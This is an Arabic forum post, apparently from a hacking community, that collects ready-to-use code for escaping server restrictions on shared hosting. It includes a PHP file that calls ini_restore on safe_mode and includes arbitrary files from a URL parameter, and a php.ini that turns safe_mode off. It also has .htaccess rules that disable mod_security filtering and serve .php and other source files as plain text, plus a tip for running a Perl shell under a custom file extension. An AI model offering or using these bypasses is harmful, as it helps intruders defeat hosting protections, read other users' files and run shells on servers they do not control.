السلام عليكم و رحمة الله تعالى و بركاته
أنا جمعت بعض الأكواد ان شاء الله تفيدكم
هنالك فرق في التخطي
الأول هو التخطي السيف مود و يكون في اصدارات php
مثال هدا الكود في ini.php
كود PHP:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
و كدلك ملف php.ini
كود PHP:
short_open_tag = On
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = On
register_globals = Off
magic_quotes_runtime = Off
magic_quotes_gpc = On
allow_url_fopen = on
AddHandler application/x-httpd-php4 .php
display_errors = Off
disable_functions = Bypass By ReD
safe_mode = Off
ملاحظة : هده الطريقة لا تتخطى جميع الاصدارات
لكن تتخطى في كثير من الأحيان
نجي الأن ما يخص تخطي apache الاباتشي أو ليتسبيد
لما نريد عمل اختصار مجلد أو عمل سملنك لملف معين
يطلع معانا خطأ Forbidden + Internal Server Error + 406 not acceptable
نسوي هتاكسس و نشوف هدا الكود
كود PHP:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
DirectoryIndex seees.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddType text/plain .pl
AddType text/plain .asp
AddType text/plain .htm
AddType text/plain .shtml
AddType text/plain .shtm
AddType text/plain .htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
نجي نحلل هدا الهتاكسس
هدا بيتخطى كثير الفوربدن
كود PHP:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
أما بالنسبة ل 406 not acceptablr
فالحل هو هدا
كود PHP:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
أما Internal Server Error
فهدا الكود بيتخطاه
كود PHP:
DirectoryIndex seees.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddType text/plain .pl
AddType text/plain .asp
AddType text/plain .htm
AddType text/plain .shtml
AddType text/plain .shtm
AddType text/plain .htaccess
اه كمان شئ مهم
مثلا لو أريد تشغيل البيرل كمثال في السرفر
رح أحط مثلا في الهتاكسس هون AddType application/x-httpd-cgi.red
مع انشاء ملف اخر بيرل يكون shellperl.red
ما الى هدا هناك طرق كثييييرة جدا في التخطي
و ارجو من الشباب التفريق ما بين هدان الأمرين
والله ولي التوفيق
سلام
hgtvr fdk jo'd plhdhj php , apache o'H dru tdi ;edv lk hgi;v.